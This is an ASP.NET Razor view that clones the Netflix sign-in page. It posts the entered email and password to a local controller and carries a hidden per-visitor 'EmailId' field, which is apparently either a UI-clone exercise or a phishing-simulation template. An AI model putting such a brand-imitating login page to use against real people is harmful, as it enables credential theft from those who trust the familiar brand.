@page
@model WebApplicationProject.Views.NetflixLogin.NetfixLoginModel
@{
    Layout = null; // Bu sayfa için layout kullanılmasını devre dışı bırakır
}

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Netflix Login Page | CodingNepal</title>
    <link rel="stylesheet" href="/css/style1.css">
</head>
<body>
    <nav>
        <a href="~/css/logo.svg"><img src="~/css/hero-img.jpg" alt="logo"></a>
    </nav>
    <div class="form-wrapper">
        <h2>Sign In</h2>
        <form asp-controller="NetflixLogin" asp-action="PostLogin" method="post">
            <div class="form-control">
                <input type="text" id="Email" name="Email">
                <label for="Email">Email or phone number</label>
            </div>
            <div class="form-control">
                <input type="password" id="Password" name="Password">
                <label>Password</label>
            </div>

            <div class="form-control">
                <input type="hidden" id="EmailId" name="EmailId" value="@ViewBag.EmailId">
            </div>

            <button type="submit" value="submit">Sign In</button>
            <div class="form-help">
                <div class="remember-me">
                    <input type="checkbox" id="remember-me">
                    <label for="remember-me">Remember me</label>
                    
                </div>
                <a href="#">Need help?</a>
            </div>
        </form>
        <p>New to Netflix? <a href="#">Sign up now</a></p>
        <small>
            This page is protected by Google reCAPTCHA to ensure you're not a bot.
            <a href="#">Learn more.</a>
        </small>
    </div>
    <script src="~/js/emailValidation"></script>
</body>
</html>